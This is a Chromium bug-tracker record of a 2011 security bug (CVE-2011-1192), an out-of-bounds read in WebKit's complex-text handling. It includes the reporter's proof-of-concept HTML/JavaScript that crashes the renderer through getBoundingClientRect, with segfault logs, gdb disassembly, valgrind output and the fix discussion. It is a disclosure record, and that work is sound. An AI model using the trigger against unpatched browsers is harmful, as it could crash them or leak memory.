Project: chromium Issues People Development process History Sign in
New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.
Starred by 2 users
Status: Fixed
Owner:
Last visit 26 days ago
Closed: Feb 2011
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: Linux
Pri: 1
Type: Bug-Security

Restricted
  • Only users with EditIssue permission may comment.



Sign in to add a comment
width of boundingClientRect for Range with unicode combining characters is corrupted
Reported by miau...@gmail.com, Jan 25 2011 Back to list
VULNERABILITY DETAILS

width of boundingClientRect is corrupted strange values.  possibly segfaulting at high offset.

VERSION
Chrome Version: 
Ubuntu 
Google Chrome 8.0.552.237 
Linux 2.6.35-25-generic #44-Ubuntu SMP x86_64 GNU/Linux

Chromium 
10.0.648.0~svn20110124r72310-0ubuntu1~ucd2~maverick
Linux 2.6.35-25-generic #44-Ubuntu SMP x86_64 GNU/Linux

Chromium 10.0.650.0
on ubuntu 32 bit, 2.6.35-22
from http://build.chromium.org/f/chromium/snapshots/chromium-rel-linux/

not affected: windows7 32bit, chrome stable, windows xp 32bit, chrome stable

REPRODUCTION CASE

on 32 bits I've only gotten it to segfault a couple of times, but I consistenly get weird values for length and width in the console, such as 0xFFFFFF00, 2^31, 2^32, -2^31, or any random number between 100 and 2^32

with --single-process I don't get the combined unicode characters showing up, only blank boxes, and then I'm unable to reproduce.  gdb stuff is from running with
--renderer-cmd-prefix='xterm -e gdb --eval-command=run --args'

<span id="a">A&#x20d5;A&#xFE20;A&#x20d5;A&#x20d5;A&#x20d5;A&#x20d5;A&#x20d5;&#x20d5;A&#x034b;</span>
<span id="b">e&#x0300;A&#x20da;A&#x20d5;A&#x20d5;A&#x20d5;A&#x20d5;A&#x20d5;&#x20d5;A&#x034b;</span>
<span id="c">u&#x0336;A&#xFE20;A&#x20e3;A&#x20d5;A&#x20d5;A&#x20d5;A&#x20d5;&#x20d5;A&#x034b;</span>
<span id="d">o&#x20f5;A&#xFE20;A&#x20d5;A&#x20d5;A&#x20d5;A&#x20d5;A&#x20d5;&#x20d5;A&#x034b;</span>
<script>
  var gotOne = false;
  var range;
  function uhoh(w) {
    for (var j=1; j<6; j++) {
      var test = document.getElementById(w).firstChild;
      range = document.createRange();
      range.setStart(test, 1);
      range.setEnd(test, j);
      var rect = range.getBoundingClientRect()
      if (rect.width>100 || rect.width < 0) {
        gotOne=true;
        console.log("range end: "+j);
        console.log("left: "+rect.left);
        console.log("width: " + rect.width);
      }
    }
  }

  r=5000;
  for (var i=0;i<r;i++) {
    if (gotOne) {
      break;
    }
    var s = document.createElement("script");
    s.innerHTML="uhoh('a');";
    s.innerHTML+="uhoh('b');";
    s.innerHTML+="uhoh('c');";
    s.innerHTML+="uhoh('d');";
    var body = document.getElementById("a").parentElement;
    body.appendChild(s);
  }
</script>

FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: sad tab
Crash State: 

from /var/log/kern.log:
Jan 25 18:41:41  kernel: [38107.799633] chromium-browse[32174]: segfault at 7fda3683c140 ip 00007fda32366bde sp 00007ffff6323a80 error 4 in chromium-browser[7fda30bf4000+3262000]
Jan 25 18:41:41  kernel: [38107.899078] chromium-browse[32177]: segfault at 7fda3683c140 ip 00007fda32366bde sp 00007ffff6323a80 error 4 in chromium-browser[7fda30bf4000+3262000]
Jan 25 18:41:42  kernel: [38107.998958] chromium-browse[32180]: segfault at 7fda3683c140 ip 00007fda32366bde sp 00007ffff6323a80 error 4 in chromium-browser[7fda30bf4000+3262000]
Jan 25 18:45:36  kernel: [38341.893436] chromium-browse[32454]: segfault at 7f899c61cc80 ip 00007f8998eb2c42 sp 00007fff6a9ffff0 error 4 in chromium-browser[7f8997740000+3262000]
Jan 25 18:45:39  kernel: [38344.396394] chromium-browse[32458]: segfault at 7f899c62bc80 ip 00007f8998eb2c42 sp 00007fff6a9ffff0 error 4 in chromium-browser[7f8997740000+3262000]
Jan 25 18:46:06  kernel: [38372.107255] chromium-browse[32489]: segfault at 7f899c61cc80 ip 00007f8998eb2c42 sp 00007fff6a9ffff0 error 4 in chromium-browser[7f8997740000+3262000]
Jan 25 18:46:10  kernel: [38375.334760] chrome[32523]: segfault at 5758780 ip 00000000019913de sp 00007fff48729840 error 4 in chrome[400000+3126000]
Jan 25 18:46:16  kernel: [38381.688865] chrome[32542]: segfault at 5a2c5a0 ip 00000000019913de sp 00007fff48729840 error 4 in chrome[400000+3126000]
Jan 25 18:46:17  kernel: [38382.550059] chrome[32546]: segfault at 5679000 ip 00000000019913de sp 00007fff48729760 error 4 in chrome[400000+3126000]
Jan 25 18:46:17  kernel: [38383.090843] chrome[32549]: segfault at 5679000 ip 00000000019913de sp 00007fff48729760 error 4 in chrome[400000+3126000]
Jan 25 18:46:18  kernel: [38383.659383] chrome[32552]: segfault at 5777780 ip 00000000019913de sp 00007fff48729840 error 4 in chrome[400000+3126000]
Jan 25 18:46:19  kernel: [38384.223206] chrome[32555]: segfault at 5777780 ip 00000000019913de sp 00007fff48729840 error 4 in chrome[400000+3126000]

gdb:



Program received signal SIGSEGV, Segmentation fault.
0x00000000019913de in WebCore::Font::selectionRectForComplexText(WebCore::TextRun const&, WebCore::FloatPoint const&, int, int, int) const ()
0x19913de <WebCore::Font::selectionRectForComplexText(WebCore::TextRun const&, WebCore::FloatPoint const&, int, int, int) const+382>

(gdb) i r
rax            0xfe20   65056
rbx            0x1      1
rcx            0x400    1024
rdx            0x4106b40        68184896
rsi            0x3b57750        62224208
rdi            0x7fffffff95d0   140737488328144
rbp            0x0      0x0
rsp            0x7fffffff95a0   0x7fffffff95a0
r8             0x37a9378        58364792
r9             0x1da    474
r10            0xffffff00       4294967040
r11            0x0      0
r12            0xffffffff       4294967295
r13            0x5      5
r14            0x7fffffff95d0   140737488328144
r15            0x7fffffff9a50   140737488329296
rip            0x19913de
eflags         0x10216  [ PF AF IF RF ]
cs             0x33     51
ss             0x2b     43
ds             0x0      0
es             0x0      0
fs             0x0      0
gs             0x0      0

(gdb) disas
Dump of assembler code for function _ZNK7WebCore4Font27selectionRectForComplexTextERKNS_7TextRunERKNS_10FloatPointEiii:
   0x0000000001991385 <+293>:   retq   
   0x0000000001991386 <+294>:   jmp    0x1991390 <_ZNK7WebCore4Font27selectionRectForComplexTextERKNS_7TextRunERKNS_10FloatPointEiii+304>
   0x0000000001991388 <+296>:   nop
   0x0000000001991389 <+297>:   nop
   0x000000000199138a <+298>:   nop
   0x000000000199138b <+299>:   nop
   0x000000000199138c <+300>:   nop
   0x000000000199138d <+301>:   nop
   0x000000000199138e <+302>:   nop
   0x000000000199138f <+303>:   nop
   0x0000000001991390 <+304>:   cmp    $0xffffffffffffffff,%ebp
   0x0000000001991393 <+307>:   jne    0x19912fb <_ZNK7WebCore4Font27selectionRectForComplexTextERKNS_7TextRunERKNS_10FloatPointEiii+155>
   0x0000000001991399 <+313>:   mov    0xc8(%rsp),%ebp
   0x00000000019913a0 <+320>:   jmpq   0x19912fb <_ZNK7WebCore4Font27selectionRectForComplexTextERKNS_7TextRunERKNS_10FloatPointEiii+155>
   0x00000000019913a5 <+325>:   jmp    0x19913a8 <_ZNK7WebCore4Font27selectionRectForComplexTextERKNS_7TextRunERKNS_10FloatPointEiii+328>
   0x00000000019913a7 <+327>:   nop
   0x00000000019913a8 <+328>:   test   %ebx,%ebx
   0x00000000019913aa <+330>:   js     0x19913b0 <_ZNK7WebCore4Font27selectionRectForComplexTextERKNS_7TextRunERKNS_10FloatPointEiii+336>
   0x00000000019913ac <+332>:   test   %al,%al
   0x00000000019913ae <+334>:   jne    0x1991420 <_ZNK7WebCore4Font27selectionRectForComplexTextERKNS_7TextRunERKNS_10FloatPointEiii+448>
   0x00000000019913b0 <+336>:   mov    0xd0(%rsp),%eax
   0x00000000019913b7 <+343>:   sub    %eax,%ebx
   0x00000000019913b9 <+345>:   test   %r13d,%r13d
   0x00000000019913bc <+348>:   js     0x1991410 <_ZNK7WebCore4Font27selectionRectForComplexTextERKNS_7TextRunERKNS_10FloatPointEiii+432>
   0x00000000019913be <+350>:   test   %dl,%dl
   0x00000000019913c0 <+352>:   je     0x1991410 <_ZNK7WebCore4Font27selectionRectForComplexTextERKNS_7TextRunERKNS_10FloatPointEiii+432>
   0x00000000019913c2 <+354>:   cmp    %r13d,%eax
   0x00000000019913c5 <+357>:   jbe    0x1991410 <_ZNK7WebCore4Font27selectionRectForComplexTextERKNS_7TextRunERKNS_10FloatPointEiii+432>
   0x00000000019913c7 <+359>:   mov    0xa0(%rsp),%rax
   0x00000000019913cf <+367>:   movslq %r13d,%rdx
   0x00000000019913d2 <+370>:   movzwl (%rax,%rdx,2),%eax
   0x00000000019913d6 <+374>:   mov    0xb8(%rsp),%rdx
=> 0x00000000019913de <+382>:   movss  (%rdx,%rax,4),%xmm0
   0x00000000019913e3 <+387>:   mov    0xe8(%rsp),%rdx
   0x00000000019913eb <+395>:   cvttss2si %xmm0,%r12d
   0x00000000019913f0 <+400>:   cmpb   $0x0,0x19(%rdx)
   0x00000000019913f4 <+404>:   je     0x19912d0 <_ZNK7WebCore4Font27selectionRectForComplexTextERKNS_7TextRunERKNS_10FloatPointEiii+112>
   0x00000000019913fa <+410>:   mov    0x90(%rsp),%rdx
   0x0000000001991402 <+418>:   mov    (%rdx,%rax,4),%eax
   0x0000000001991405 <+421>:   sar    $0x6,%eax

(gdb) bt
#0  0x00000000019913de in WebCore::Font::selectionRectForComplexText(WebCore::TextRun const&, WebCore::FloatPoint const&, int, int, int) const ()
#1  0x0000000001914386 in WebCore::Font::selectionRectForText(WebCore::TextRun const&, WebCore::FloatPoint const&, int, int, int) const ()
#2  0x0000000001c6fb97 in WebCore::InlineTextBox::selectionRect(int, int, int, int) ()
#3  0x0000000001d157b6 in WebCore::RenderText::absoluteQuadsForRange(WTF::Vector<WebCore::FloatQuad, 0ul>&, unsigned int, unsigned int, bool) ()
#4  0x0000000001ac669b in WebCore::Range::getBorderAndTextQuads(WTF::Vector<WebCore::FloatQuad, 0ul>&) const ()
#5  0x0000000001ac6a2c in WebCore::Range::getBoundingClientRect() const ()
#6  0x00000000017bbc0e in WebCore::RangeInternal::getBoundingClientRectCallback(v8::Arguments const&) ()
#7  0x00007fffc80a879c in ?? ()
#8  0x00007fffffff9df0 in ?? ()
#9  0x00007fffffff9df0 in ?? ()
#10 0x0000000000000000 in ?? ()

valgrind for chromium:

==979== Use of uninitialised value of size 8
==979==    at 0x1991442: WebCore::Font::selectionRectForComplexText(WebCore::TextRun const&, WebCore::FloatPoint const&, int, int, int) const (in /home/user/chromium/src/out/Release/chrome)
==979==    by 0x1914385: WebCore::Font::selectionRectForText(WebCore::TextRun const&, WebCore::FloatPoint const&, int, int, int) const (in /home/user/chromium/src/out/Release/chrome)
==979==    by 0x1C6FB96: WebCore::InlineTextBox::selectionRect(int, int, int, int) (in /home/user/chromium/src/out/Release/chrome)
==979==    by 0x1D157B5: WebCore::RenderText::absoluteQuadsForRange(WTF::Vector<WebCore::FloatQuad, 0ul>&, unsigned int, unsigned int, bool) (in /home/user/chromium/src/out/Release/chrome)
==979==    by 0x1AC669A: WebCore::Range::getBorderAndTextQuads(WTF::Vector<WebCore::FloatQuad, 0ul>&) const (in /home/user/chromium/src/out/Release/chrome)
==979==    by 0x1AC6A2B: WebCore::Range::getBoundingClientRect() const (in /home/user/chromium/src/out/Release/chrome)
==979==    by 0x17BBC0D: WebCore::RangeInternal::getBoundingClientRectCallback(v8::Arguments const&) (in /home/user/chromium/src/out/Release/chrome)
==979==    by 0x1095669: v8::internal::Builtin_HandleApiCall(v8::internal::(anonymous namespace)::BuiltinArguments<(v8::internal::BuiltinExtraArguments)1>) (in /home/user/chromium/src/out/Release/chrome)
==979== 
==979== Invalid read of size 4
==979==    at 0x1991442: WebCore::Font::selectionRectForComplexText(WebCore::TextRun const&, WebCore::FloatPoint const&, int, int, int) const (in /home/user/chromium/src/out/Release/chrome)
==979==    by 0x1914385: WebCore::Font::selectionRectForText(WebCore::TextRun const&, WebCore::FloatPoint const&, int, int, int) const (in /home/user/chromium/src/out/Release/chrome)
==979==    by 0x1C6FB96: WebCore::InlineTextBox::selectionRect(int, int, int, int) (in /home/user/chromium/src/out/Release/chrome)
==979==    by 0x1D157B5: WebCore::RenderText::absoluteQuadsForRange(WTF::Vector<WebCore::FloatQuad, 0ul>&, unsigned int, unsigned int, bool) (in /home/user/chromium/src/out/Release/chrome)
==979==    by 0x1AC669A: WebCore::Range::getBorderAndTextQuads(WTF::Vector<WebCore::FloatQuad, 0ul>&) const (in /home/user/chromium/src/out/Release/chrome)
==979==    by 0x1AC6A2B: WebCore::Range::getBoundingClientRect() const (in /home/user/chromium/src/out/Release/chrome)
==979==    by 0x17BBC0D: WebCore::RangeInternal::getBoundingClientRectCallback(v8::Arguments const&) (in /home/user/chromium/src/out/Release/chrome)
==979==    by 0x1095669: v8::internal::Builtin_HandleApiCall(v8::internal::(anonymous namespace)::BuiltinArguments<(v8::internal::BuiltinExtraArguments)1>) (in /home/user/chromium/src/out/Release/chrome)
==979==  Address 0x357069c4 is not stack'd, malloc'd or (recently) free'd
==979== 
==979== Process terminating with default action of signal 11 (SIGSEGV)
==979==  Access not within mapped region at address 0x35A0A244
==979==    at 0x1991442: WebCore::Font::selectionRectForComplexText(WebCore::TextRun const&, WebCore::FloatPoint const&, int, int, int) const (in /home/user/chromium/src/out/Release/chrome)
==979==    by 0x1914385: WebCore::Font::selectionRectForText(WebCore::TextRun const&, WebCore::FloatPoint const&, int, int, int) const (in /home/user/chromium/src/out/Release/chrome)
==979==    by 0x1C6FB96: WebCore::InlineTextBox::selectionRect(int, int, int, int) (in /home/user/chromium/src/out/Release/chrome)
==979==    by 0x1D157B5: WebCore::RenderText::absoluteQuadsForRange(WTF::Vector<WebCore::FloatQuad, 0ul>&, unsigned int, unsigned int, bool) (in /home/user/chromium/src/out/Release/chrome)
==979==    by 0x1AC669A: WebCore::Range::getBorderAndTextQuads(WTF::Vector<WebCore::FloatQuad, 0ul>&) const (in /home/user/chromium/src/out/Release/chrome)
==979==    by 0x1AC6A2B: WebCore::Range::getBoundingClientRect() const (in /home/user/chromium/src/out/Release/chrome)
==979==    by 0x17BBC0D: WebCore::RangeInternal::getBoundingClientRectCallback(v8::Arguments const&) (in /home/user/chromium/src/out/Release/chrome)
==979==    by 0x1095669: v8::internal::Builtin_HandleApiCall(v8::internal::(anonymous namespace)::BuiltinArguments<(v8::internal::BuiltinExtraArguments)1>) (in /home/user/chromium/src/out/Release/chrome)


 
5.html
1.2 KB View Download
Labels: -Pri-0 -Area-Undefined Pri-1 Area-WebKit WebKit-Core OS-Linux Mstone-9
Status: Untriaged
Summary: width of boundingClientRect for Range with unicode combining characters is corrupted (was: NULL)
This is not reproducible on Windows.

Renderer crashes on Linux. Crash can be seen on Chrome9.0 as well.

Full report @ http://crash/reportdetail?reportid=0c0c912607c2f617

Comment 3 by evan@chromium.org, Jan 26 2011
Status: Assigned
Thanks for the quick patch Evan! Looking at the patch, the actual fault for what's going wrong isn't clear. Is it an out-of-bounds read? Out-of-bounds write? Use of out-of-bounds object vtable...?
Comment 6 by evan@chromium.org, Jan 27 2011
Example:

WebKit gives us a string: [ABCdefg] and then asks us "what pixel offset is the 4th character ('e') at?"

In complex-text land, we intend to break that string into smaller runs:
1) we shape ABC into characters and offset arrays.  we throw most of this away because we're looking for the 4th, but we keep the width of ABC know where defg goes
2) we shape defg into characters and offsets.  4th char is is within this, so we use the position of 'e' as computed.

Bug was:
In (1), when deciding whether 'e' is within the list of characters we've computed offsets for, we were testing whether it was within the length of the *entire* string (ABCdefg) so we'd index into our offset array (which was only computed for ABC) for the 4th element.

So it's an out-of-bounds read, I think.
Labels: SecSeverity-Medium
Status: WillMerge
Committed r76732: <http://trac.webkit.org/changeset/76732>

Seems simple enough to merge to m9, m10 -> WillMerge
Comment 9 by miau...@gmail.com, Feb 1 2011
the webkit bug is publicly visible. is that normal?
No. I flagged it as a security bug; thanks.
Labels: tomerge
Labels: -Mstone-9 -tomerge Mstone-10
Seems risky for M9, we'll merge to M10.
Comment 13 by evan@chromium.org, Feb 8 2011
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify
Status: FixUnreleased
merged to m10 in r78153. @chris thinks risky for m9, ignoring for m9.
Labels: CVE-2011-1192
Labels: Type-Security
Labels: SecImpacts-Stable
Batch update.
Labels: -Restrict-View-SecurityNotify
Lifting view restrictions.
Status: Fixed
Project Member Comment 20 by bugdroid1@chromium.org, Oct 13 2012
Labels: Restrict-AddIssueComment-Commit
This issue has been closed for some time. No one will pay attention to new comments.
If you are seeing this bug or have new data, please click New Issue to start a new bug.
Project Member Comment 21 by bugdroid1@chromium.org, Mar 10 2013
Labels: -Area-WebKit -WebKit-Core -Mstone-10 -SecSeverity-Medium -Type-Security -SecImpacts-Stable Cr-Content Security-Impact-Stable Security-Severity-Medium Type-Bug-Security M-10 Cr-Content-Core
Project Member Comment 22 by bugdroid1@chromium.org, Mar 13 2013
Labels: -Restrict-AddIssueComment-Commit Restrict-AddIssueComment-EditIssue
Project Member Comment 23 by bugdroid1@chromium.org, Mar 21 2013
Labels: -Security-Impact-Stable Security_Impact-Stable
Project Member Comment 24 by bugdroid1@chromium.org, Mar 21 2013
Labels: -Security-Severity-Medium Security_Severity-Medium
Project Member Comment 25 by bugdroid1@chromium.org, Apr 6 2013
Labels: -Cr-Content Cr-Blink
Labels: reward-topanel
Project Member Comment 27 by sheriffbot@chromium.org, Oct 1 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member Comment 28 by sheriffbot@chromium.org, Oct 2 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic
Sign in to add a comment